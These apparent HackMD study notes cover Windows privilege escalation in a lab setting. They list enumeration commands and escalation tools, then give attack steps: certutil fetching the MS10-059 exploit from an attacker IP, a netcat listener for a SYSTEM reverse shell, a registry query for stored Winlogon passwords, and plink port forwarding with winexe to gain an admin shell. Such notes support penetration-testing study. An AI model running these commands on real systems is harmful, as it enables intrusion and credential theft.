Try   HackMD

Windows Privilege Escalation

tags: windows priv esc

Fuzzy Security reference
Windows Priv Esc Guide -abs
Priv Esc Windows Guide -sushant
Payload all the things

# to get system info use:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# to check patching levels use:
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn

# to list drives use:
wmic logicaldisk get caption,description,providername

# show current user
whoami

# show current privileges
whoami /priv 

# show groups for current user
whoami /groups 

# show users on the machine
net user 

# show info for user x
net user x

# show info for group x
net localgroup x

# show arp table
arp -a

# show routing table
route print

# network statistics
netstat -ano

# see defender status (sc is service control)
sc query windefend

# see all services running
sc queryex type= service

# see state of fw through either of these two commands
netsh firewall show state
netsh advfirewall firewall dump

# see config
netsh firewall show config


Automated Tools Overview

WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Sherlock - https://github.com/rasta-mouse/Sherlock

Watson - https://github.com/rasta-mouse/Watson

PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

JAWS - https://github.com/411Hall/JAWS

Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

Seatbelt - https://github.com/GhostPack/Seatbelt

SharpUp - https://github.com/GhostPack/SharpUp

To install pip incase you don't have it
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

Manual Exploitation

We can compile the exploit then set up a web server with python for the victim machine to reach out to and download the file.

# set up the server python -m SimpleHTTPServer 80 #or python3 -m HTTP.server # navigate to the webserver and download the file certutil -urlcache -f http://ip/filename localName e.g certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe

We then set up a listener for the victim to connect back to:

# setup a listener on the attacker machine nc -nlvp 5555 # run the exploit on the victim ms.exe ip port e.g ms.exe 10.10.14.4 5555 # pops a shell as NT AUTHORITY\SYSTEM

MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Password abuse

# once we have a shell we can run the command below to look for default passwords stored in registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # for machines where a port is only available internally, we can forward that port if we have a low level shell # we can forward the traffic using plink.exe which can be downloaded from the putty download page # before using plink, lets edit the ssh_config to allow root login by changing the PermitRootLogin to true under /etc/ssh/sshd_config # the command syntax is # plink.exe -l SuperUser -pw Passwd -R internalPort:localhost:ExternalPort External ip plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4 # we can pop an admin shell with the command below over the previously forwaded port winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe"

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Stabilizing a shell

TTy shell escape